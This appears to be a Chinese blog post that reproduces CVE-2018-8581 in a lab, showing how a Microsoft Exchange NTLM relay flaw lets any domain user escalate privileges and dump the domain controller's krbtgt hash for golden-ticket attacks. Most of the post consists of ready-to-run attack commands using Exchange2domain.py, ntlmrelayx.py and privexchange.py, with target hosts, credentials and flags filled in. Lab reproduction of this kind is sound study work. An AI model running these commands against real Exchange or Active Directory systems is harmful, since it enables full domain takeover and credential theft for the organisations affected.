CVE-2018-8581復(fù)現(xiàn)

漏洞描述:

Exchange Server于2018年11月份被爆出存在SSRF漏洞,可以偽造任意用戶。但在之后又被爆出另外一種攻擊方式,可以使用任意域內(nèi)用戶通過NTML Relay獲取到krbtgt的hash。該hash可用于制作黃金票據(jù),最后可以達(dá)到全域通暢的效果。

影響范圍:

Exchange 2010、Exchange 2013、Exchange 2016

漏洞復(fù)現(xiàn):

環(huán)境:
DC Windows 2012 (192.168.52.3/ad01.qfdomain.com)
Exchange 2013 Windows 2012 (192.168.52.4/mail.qfdomain.com)
Attack Parrot (192.168.52.101)

攻擊方式一:

python Exchange2domain.py -ah 192.168.52.101 -ap 80 -u attack -p "attack" -d qfdomain.com -th 192.168.52.3  192.168.52.4 --no-ssl

一鍵獲取krbtgt的hash

image.png

攻擊方式二
一、開啟反射監(jiān)聽

 python2 ntlmrelayx.py -t ldap://192.168.52.3 --escalate-user attack
monitor

二、開啟攻擊

python2 privexchange.py -ah 192.168.52.101 mail.qfdomain.com -u attack -p "attack" -d qfdomain.com --no-ssl --debug
attack

三、如果攻擊成功,那么會在我們的監(jiān)聽端看到DC反連我們的信息

image.png

四、拉取HASH

image.png
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容